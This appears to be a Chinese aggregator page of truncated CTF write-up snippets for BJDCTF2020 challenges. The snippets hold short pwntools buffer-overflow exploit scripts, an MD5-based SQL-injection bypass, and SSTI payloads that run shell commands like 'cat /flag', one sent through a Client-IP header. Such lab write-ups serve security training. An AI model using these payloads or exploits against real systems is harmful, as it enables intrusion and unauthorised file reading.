E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
BJDCTF2020
CTF学习笔记——[
BJDCTF2020
]Easy MD5
一、[
BJDCTF2020
]EasyMD51.题目2.解题步骤题目是一个简简单单查询框。
Obs_cure
·
2023-08-06 12:55
网络安全
[
BJDCTF2020
]Easy MD5 解题思路&过程
打开题目链接,页面十分简洁,只有一个提交查询的输入框试着输入些字符,观察回显情况;发现没有任何回显。接着查看源代码寻找提示,源代码中没有提示,在响应头中发现了hint。hint:select*from'admin'wherepassword=md5($pass,true)构造$pass字符串经md5加密后出现'or',则可令该SQL语句返回true,与万能密码的原理相同。像这样的字符串有:1295
NickWilde233
·
2023-07-25 04:30
CTF刷题
安全
php
md5
[
BJDCTF2020
]Mark loves cat
题目图片.png过程1.需要用到dirsearch和githack,项目已经部署在gihub上,直接gitcloneurl就可以下载https://github.com/maurosoria/dirsearchhttps://github.com/BugScanTeam/GitHack2.dirsearch扫描目录,发现存在源码泄露python3dirsearch.py-ephp,txt,zip-
浩歌已行
·
2023-07-16 19:58
BUUCTF刷题十一道(06)
De1CTF2019]SSRFMe[极客大挑战2019]FinalSQL[CISCN2019华东南赛区]Web11[BSidesCF2019]Futurella[SUCTF2019]Pythonginx[
BJDCTF2020
Sprint#51264
·
2023-06-23 11:41
Web
靶场
网络安全
ctf
web
buuctf7
目录CryptoMD5Url编码看我回旋踢web[极客大挑战2019]BuyFlag[
BJDCTF2020
]EasyMD5CryptoMD51.下载文件2.md5在线解密3.外包flagUrl编码使用url
木…
·
2023-06-17 14:31
安全
BJDCTF2020
babystack
checksec64位nxida:ret2textexp:frompwnimport*r=remote("pwn.challenge.ctf.show",28117)backdoor=0x4006e6retn=0X4006far.recvuntil("name:\n")r.sendline("100")r.recvuntil("name?")payload=b"a"*0x18+p64(backdo
whit233
·
2023-04-20 18:02
ctfshow
pwn详细wp
python
bjdctf2020
babystack
frompwnimport*p=process('./bjdctf_2020_babystack')p.recvuntil("lengthofyourname:\n")p.sendline('1024')p.recvuntil("What'suname?\n")payload='a'*12+p32(1024)+'a'*8+p64(0x00000000004006E6)p.sendline(payl
「已注销」
·
2023-04-20 18:32
pwn
BUUCTF-WEB-INF/web.xml泄露-SSTI注入
第八周目录WEB[RoarCTF2019]EasyJavaWEB-INF/web.xml泄露WEB-INF/web.xml泄露原因WEB-INF/web.xml泄露利用方法解决方法[
BJDCTF2020
双层小牛堡
·
2023-04-17 18:06
BUUctf
xml
java
servlet
BUUCTF-[
BJDCTF2020
]Easy MD5 记录
[
BJDCTF2020
]EasyMD5界面没发现啥特别,抓包看看,发现一条隐藏提示。到了这步卡住了,看了下wp,发现ffifdyop绕过,为啥可以绕过,大概意思就是ffifdyop。
低调求发展
·
2023-04-16 17:22
buu(前三页第一弹) RSA习题与相关知识总结
buuctfrsa21题目描述:题目分析:收获与体会:buuctf[HDCTF2019]bbbbbbrsa1题目描述:题目解析:收获与体会:buuctfRSA51题目描述:题目分析:收获与体会:buuctf[
BJDCTF2020
Emmaaaaaaaaaa
·
2023-04-13 10:41
buuctf
密码RSA
python
密码学
安全
python
NSSCTF Pwn Page 1 - 2
解题步骤:查看源码EXP:[SWPUCTF2021新生赛]gift_pwn知识点:Checksec&IDAEXP:第一种:第二种[CISCN2019华北]PWN1知识点:Checksec&IDAEXP:[
BJDCTF2020
Red-Leaves
·
2023-04-13 03:30
Pwn
linux
网络安全
python
网络
学习
BUUCTF-MD5强弱比较-MD5()的万能密码-tornado框架注入-中文电码
第六周第三次目录学习到的知识1.MD5强弱比较可以都可以使用数组绕过2.基于MD5()的万能密码ffifdyopWEB[
BJDCTF2020
]EasyMD5编辑[护网杯2018]easy_tornadoCrypto
双层小牛堡
·
2023-04-12 17:24
BUUctf
java
开发语言
[
BJDCTF2020
]Cookie is so stable(PHP|Twig|SSTI)
目录信息收集hint页面flag页面命令执行reference信息收集hint页面flag页面输入任意内容(这里输入admin)这里第一反应是cookie类的SQL注入?但是发现这里其实并没有实现查询信息的功能,只是将输入的内容进行打印,看下前端源码,可能是SSTI!修改cookie${7*7}----------{{7*7}}---------{{7*'7'}}确认是SSTI(PHP),根据上文
coleak
·
2023-04-06 18:40
web安全
php
web安全
网络安全
安全
开发语言
攻防世界 favorite_number mfw、[
BJDCTF2020
]ZJCTF,不过如此
favorite_number进入环境得到源码这里发现一个assert()函数,想到估计是代码执行漏洞,而$page没有任何的控制直接拼接,我们想利用assert()函数执行cat./templates/flag.php获得flag,那么肯定要破坏原来的assert结构才能,使得我们目标才能达成assert("strpos('$file','..')===false")assert("file_e
听门外雪花飞
·
2023-04-05 04:54
ctf刷题纪
php
开发语言
[
BJDCTF2020
]Easy MD5
寻找思路打开看页面只有一个框,啥也没有,于是翻看源码、数据包啥的看看有没有什么线索。可以在数据包内发现有个hint:Hint:select*from'admin'wherepassword=md5($pass,true)然后方向大概知道了,进行sql注入。但是如何在经过md5加密之后还能形成注入。我们目标构造形成'or'数字以此形成万能密码。md5($pass,true)这个php函数参考了很多大
glan想睡觉
·
2023-04-03 17:08
wp
学习
安全
【学习笔记 20】buu [
BJDCTF2020
]Easy MD5
知识点password='".md5($pass,true)."'解题360截图17290429273651.PNG360截图17891228296729.PNG这里可以看到是通过get参数进行传参,但是这里也没有其他的提示,尝试传统的抓包,等分析没有得到有用信息,查看大佬wp,知道了其中调用了这样的函数password='".md5($pass,true)."'就是将你输入的命令进行MD5加密后
Noslpum
·
2023-03-30 12:43
[
BJDCTF2020
]The mystery of ip
题目图片.png过程1.抓包分析,flag.php,hint.php,index.php,发现貌似和ip有关图片.png图片.png2.客户端请求头,XFF和client-ip都可。发现可以控制输入图片.png3.尝试是否可以进行逻辑运算{7*8},发现可以图片.png4.尝试系统命令client-ip:{system('ls')}发现可以,尝试cat/flag,没有任何过滤图片.png
浩歌已行
·
2023-03-26 08:26
buu(前三页第三弹) RSA习题与相关知识总结
文章目录[
BJDCTF2020
]rsa_output1:题目描述:题目分析:收获与体会:SameMod1题目描述:题目分析:收获与体会:buu[
BJDCTF2020
]easyrsa1题目描述:题目分析:
Emmaaaaaaaaaa
·
2023-03-23 18:06
python
buuctf
密码RSA
python
密码学
安全
[
BJDCTF2020
]Easy MD5(浅谈PHP弱类型hash比较缺陷)
目录信息收集构造payloadPHP弱类型hash比较缺陷0e碰撞数组MD5总结信息收集看题目应该和MD5加密相关select*from'admin'wherepassword=md5($pass,true)PHP的MD5函数string必需。规定要计算的字符串。raw可选。规定十六进制或二进制输出格式:TRUE-原始16字符二进制格式FALSE-默认。32字符十六进制数构造payload";ec
coleak
·
2023-01-25 08:52
web安全
密码学
PHP
安全
php
web安全
ctf_BUUCTF_web(1)
[
BJDCTF2020
]EasyMD56.[极客大挑战2019]HardSQL7.[GXYCTF2019]BabySQli8.[GYCTF2020]Blacklist9.
过动猿
·
2022-11-25 17:45
ctf安全-web
ctf
BUUCTF
web
[
BJDCTF2020
]BJD hamburger competition
c#逆向解压附件可以看到unity用dnspy反编译Assembly-CSharp.dll这里应该是sha1和md5但是md5是自写的拿vs跑一下就行c#代码:namespaceA004{classProgram{staticvoidMain(string[]args){byte[]bytes=Encoding.UTF8.GetBytes("1001");byte[]array=MD5.Creat
FeiJiNcFan
·
2022-10-02 08:38
reverse
reverse
c#
[
BJDCTF2020
]The mystery of ip
点击flag发现经过一番查找,发现这是个内网地址,而且不是访问者的ip使用X-Forwarded-For进行伪造地址:测试{{2*2}}直接查看当前目录下的内容:{{system('ls')}}查看flag.php{{system('catflag.php')}}是假的,被骗了再查看根目录{{system('ls/')}}然后查看flag{{system('cat/flag')}}得到flag
Yb_140
·
2022-09-25 00:59
BUUCTF
web安全
代码审计后的SSI注入漏洞
[
BJDCTF2020
]EasySearch首先就是dirsearch扫描,用dirsearch的前提一定是前端看不到啥东西了,呢就不用猜,绝对有一些隐藏文件。
H0ne
·
2022-09-05 16:30
安全
wireshark
udp
[
BJDCTF2020
]Mark loves cat-1|源代码泄露|变量覆盖
主要考察了:源代码泄露、变量覆盖共展示了三种获取flag的方式1、打开题目查看未发现有效信息,查看源代码信息,发现返回的dog信息,结果如下:2、使用dirmap进行目录扫描,发现了.git/config,那就想到了源代码泄露的问题,使用githack工具获取源代码信息,但是只获取到了一些js
upfine
·
2022-08-17 09:00
[
BJDCTF2020
]Mark loves cat-1|源代码泄露|变量覆盖
主要考察了:源代码泄露、变量覆盖共展示了三种获取flag的方式1、打开题目查看未发现有效信息,查看源代码信息,发现返回的dog信息,结果如下:2、使用dirmap进行目录扫描,发现了.git/config,那就想到了源代码泄露的问题,使用githack工具获取源代码信息,但是只获取到了一些js
upfine
·
2022-08-16 17:00
[
BJDCTF2020
]Cookie is so stable-1|SSTI注入
1、打开之后在各个界面查看源代码,未发现很明显的有用信息,仅发现了提示,结果如下:2、尝试输入数据,结果就是输入什么就回显什么,也未进行过滤,尝试进行sql注入失败,结果如下:3、那就根据提示抓包查看下cookie信息,结果如下:4、sql注入失败,这里想到了ssti注入,那就进行ssti注入
upfine
·
2022-07-30 10:00
SSTI 模板注入漏洞总结之[
BJDCTF2020
]Cookie is so stable
知识点:模板注入漏洞总结:参考:很全的总结:一篇文章带你理解漏洞之SSTI漏洞|K0rz3n'sBlog1.常用的模板引擎PHP:smartyTwigBlade;python:jinja2djangotornadojava:JSPFreeMarkerVelocity当在服务端接收了用户的恶意输入以后,未经任何处理就将其作为Web应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插
一只Traveler
·
2022-07-24 07:37
CTF知识点
安全
[
BJDCTF2020
]The mystery of ip|[CISCN2019 华东南赛区]Web11|SSTI注入
记录一下BUUCTF中两个类似的SSTI注入关卡[
BJDCTF2020
]Themysteryofip-1:1、打开之后显示如下:2、在hint.php中进行了相关提示,如下:3、既然获取的是ip地址信息
upfine
·
2022-06-30 15:00
buuctf- [
BJDCTF2020
]Easy MD5 (小宇特详解)
buuctf-[
BJDCTF2020
]EasyMD5(小宇特详解)这里显示查询这里没有回显,f12一下查看有没有有用的信息我使用的火狐浏览器在网模块中找到了响应头Hint:select*from‘admin
小宇特详解
·
2022-04-25 11:15
buuctf
php
mysql
web安全
[
BJDCTF2020
]EzPHP&DASCTF-sep:hellounser
EzPHP查看源码,然后base32解密一下进入对应文件。无语的是环境应该是出了问题,一上来就报“fxck”,导致那串代码根本没法绕过。最后破案了,需要把cookie清理一下。ThisisaverysimplechallengeandifyousolveitIwillgiveyouaflag.GoodLuck!";if($_SERVER){if(preg_match('/shana|debu|aq
二码农丫
·
2022-03-07 15:28
CTF日记
php
BUUCTF笔记之Web系列部分WriteUp(四)
[
BJDCTF2020
]Marklovescatdirb扫描目录发现.git泄露。
KogRow
·
2022-03-07 15:00
web安全
CTF
CTF
[
BJDCTF2020
]Mark loves cat
首先打开题目首先每个能点的按钮点一下,发现都是回到最顶上。于是我开始查看源代码。把源代码拖到最底下发现有一个不起眼的dog然后尝试抓包。实在没办法了,然后从github上面把源代码下载下来了这是flag.php里面的这是index.php里面的(去除掉原本能看到的)$y){$$x=$y;}foreach($_GETas$x=>$y){$$x=$$y;}foreach($_GETas$x=>$y){
FPointmaple
·
2022-02-09 23:00
[
BJDCTF2020
]EasySearch
[
BJDCTF2020
]EasySearch考点思路Payload考点ApacheSSI远程命令执行漏洞、敏感文件泄露思路①:当目标服务器开启了SSI与CGI支持,我们就可以上传shtml,利用语法执行命令
H3rmesk1t
·
2021-05-17 18:37
#
安全学习之做题解析
Apache
SSl
远程命令执行漏洞
敏感信息泄露
ctf
web安全
BUUCTF——[
BJDCTF2020
]Easy MD5
文章目录利用点解题原理1原理2完利用点ffifdyop绕过md5($pass,true)SQL注入数组绕过md5解题打开环境只有一个输入框,听闻[
BJDCTF2020
]出题人喜欢把hint藏在response
Ho1aAs
·
2021-05-17 11:36
#
Web
BUUCTF
web安全
md5绕过
ffifdyop
PHP
[
BJDCTF2020
]Mark loves cat
[
BJDCTF2020
]Marklovescat题目:打开环境,得到:习惯性的看了下菜单,随便点了点,发现页面最后有个输入框然后就随便输了几个数字,发现url栏里出现了message=1:我当时就在想可能是
o3Ev
·
2021-04-26 17:43
#
buuoj
php
web
[
BJDCTF2020
]ZJCTF,不过如此
[
BJDCTF2020
]ZJCTF,不过如此题目:打开环境,得到:".file_get_contents($text,'r').""
o3Ev
·
2021-04-26 15:40
#
buuoj
字符串
正则表达式
php
web
[
BJDCTF2020
]The mystery of ip
[
BJDCTF2020
]Themysteryofip题目:打开环境,得到:左上角有个Flag与Hint,点点Flag试试:可以看到直接记录了我的IP,出现IP都会想到一个东西:X-Forwarded-For
o3Ev
·
2021-04-25 15:39
#
buuoj
信息安全
web
BUUCTF:[
BJDCTF2020
]ZJCTF,不过如此 && 攻防世界web之ics-05 -- -preg_replace + /e 的任意代码执行漏洞
目录一、不足:二、知识点:三、做完题,看完博客后的要求:四、我的思路:没有做出来,,,五、真WP六、攻防世界web之ics-05的一些不足与收获加一个题:攻防世界web之ics-05也是这个preg_replace一、不足:在文件包含那里卡住了,想着flag.php还是next.php10多分钟后才想到可以用filter协议来读么,,,等一会看看能不能用data协议来读去???这个可以的:inde
Zero_Adam
·
2021-02-13 23:36
BUUCTF刷题记录
RCE
php
正则表达式
BUUCTF:[
BJDCTF2020
]The mystery of ip---------SSTI py
这个题,思路没想到,题做少了,,,不足:没有看出思路来。没有想到是ssti关键字测试的时候system(‘ls’)system('ls/')。别tm憨憨地写个system放那就不管了,,,憨球对ssti太不重视,只知道看一个jinja2的模板,,不知道又Twig模板注入漏洞。WP这里一直说IP。就抓包加上X-Forearded-For:127.0.0.1.跟着变化了,XFF可控,但因为是PHP页面
Zero_Adam
·
2021-02-13 08:57
php
BUUCTF 23
23-1[
BJDCTF2020
]Cookieissostable做题思路首先打开靶机之后有个提示,对我没用然后打开flag,问我什么名字,输入之后,显示的是输入的值,怀疑这
小杌
·
2021-02-05 22:22
BUUCTF [
BJDCTF2020
] EasySearch
BUUCTF[
BJDCTF2020
]EasySearch考点:ApacheSSI远程命令执行shtml文件启动环境:一个登录框,尝试了弱密码与万能密码,均无结果,继续对题目进行信息收集,使用ctf-wscan
DLNU_Meng
·
2021-01-06 00:47
BUUCTF
WEB
Writeup
BUUCTF
BJDCTF2020
EasySearch
writeup
CTF
[
BJDCTF2020
] web题-Cookie is so stable
酷炫的欢迎界面,有1个flag.php和hint.phphint.php的页面元素发现了提示去flag.php发现存在模板注入然后提示说研究cookie,使用payloadpayload:{{_self.env.registerUndefinedFilterCallback(“exec”)}}{{_self.env.getFilter(“cat/flag”)}};flag:flag{985a093
BROTHERYY
·
2020-12-31 15:09
CTF练习
[
BJDCTF2020
]ZJCTF,不过如此 简单思路及做法
前言文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途!题目稍微审计,发现需要读到文件内容为Ihaveadream,自然而然的就可以想到用伪协议来做题!注释里提醒了next.php,我们同样用伪协议base64加密来读文件data://text/plain,php://input读到的内容解码出来$st
EC_Carrot
·
2020-12-07 09:57
Web刷题记录
php
安全
BUU刷题--[
BJDCTF2020
]The mystery of ip [
BJDCTF2020
]ZJCTF,不过如此
Themysteryofip三个php文件,点进去都没啥收获。只有在flag看到了自己ip,除了想到xff头,完全就没思路了。抓个包修改xff头看一下ip可控,然后呢,然后呢,就不会了。。。。。看大佬wp之后,emmm,ip还能模板注入然后就是命令执行找flag感觉关键是要能想到这个ip能模板注入吧ZJCTF,不过如此打开看到源码。".file_get_contents($text,'r').""
uyl23
·
2020-12-02 12:52
安全
BUUCTF知识点总结(一)
但如当传入非字符串的参数,该函数会返回0;[
BJDCTF2020
]EasyMD5:知识点:md5($str,true)注入,当md5后的hex转换成字符串
吹风基
·
2020-12-01 17:02
BUUCTF [
BJDCTF2020
]ZJCTF,不过如此
[
BJDCTF2020
]ZJCTF,不过如此考点PHP伪协议preg_replace远程代码执行实操考点PHP伪协议https://www.cnblogs.com/wjrblogs/p/12285202
Chu_Jian_JX
·
2020-09-29 11:34
php
[
BJDCTF2020
]藏藏藏(修改后缀)
拖到winhex中分析会发现这是一个zip压缩包.会发现这里面还是一个压缩包文件里有个二维码扫描出flag
前方是否可导?
·
2020-09-14 21:07
MIsc
BUUCTF--[
BJDCTF2020
]easy
测试文件:https://www.lanzous.com/ib50fkb文件分析IDA打开后,在FunctionWindow里面找到ques()函数就是输出我们的flag。我们可以通过调试修改EIP地址到ques函数(0x00401520)输出flagintques(){intv0;//edxintresult;//eaxintv2[50];//[esp+20h][ebp-128h]intv3;/
Hk_Mayfly
·
2020-09-14 19:27
每天10道Crypto Day1
[
BJDCTF2020
]这是base??1.达芬奇密码蒙娜丽莎中的数字列为打乱了的斐波拉契数列,找出顺序的斐波拉契数与乱序之间的映射,将其与下面的数3696885388211
Προμηθεύς_KING
·
2020-08-25 17:54
BUUCTF
Crypto
BUUCTF RSA题目全解2
[
BJDCTF2020
]RSA5.[GKCTF2020]babycrypto6.[GWCTF2019]BabyRSA7.[
BJDCTF2020
]rsa_output8.
Προμηθεύς_KING
·
2020-08-25 17:07
RSA加密
密码学
上一页
1
2
3
4
5
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他